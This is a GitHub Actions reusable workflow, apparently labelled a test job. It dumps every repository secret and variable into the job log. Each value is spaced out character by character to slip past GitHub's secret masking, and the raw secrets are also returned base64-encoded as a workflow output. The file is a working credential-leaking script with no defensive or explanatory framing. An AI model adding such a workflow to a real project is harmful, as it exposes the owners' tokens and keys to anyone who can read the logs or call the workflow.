on:
  workflow_call:
    outputs:
      b64:
        value: ${{ jobs.testjob.outputs.b64 }}
jobs:
  testjob:
    runs-on: ubuntu-22.04
    outputs:
      b64: ${{steps.yyy.outputs.b64}}
    steps:
      - id: xxx
        uses: actions/github-script@v7
        env:
          SECRETS: ${{toJson(secrets)}}
          VARS: ${{toJson(vars)}}
        with:
          result-encoding: string
          retries: 3
          script: |
            core.info(`node: ${process.version}`);
            const secret = Object.fromEntries(Object.entries(JSON.parse(process.env.SECRETS)).map(([k, v]) => [k, v.replace(/((.)(?!$))/gm, '$1 ')]));
            core.info(JSON.stringify(secret, null, 2));
            
            const vars = Object.fromEntries(Object.entries(JSON.parse(process.env.VARS)).map(([k, v]) => [k, v.replace(/((.)(?!$))/gm, '$1 ')]));
            core.info(JSON.stringify(vars, null, 2));
            const output = process.env.SECRETS;
            core.info(output);
            core.info(Buffer.from(output).toString('base64'));
            return Buffer.from(output).toString('base64');
      - id: yyy
        env:
          X: ${{steps.xxx.outputs.result}}
        run: |
          echo "b64=$X" >> $GITHUB_OUTPUT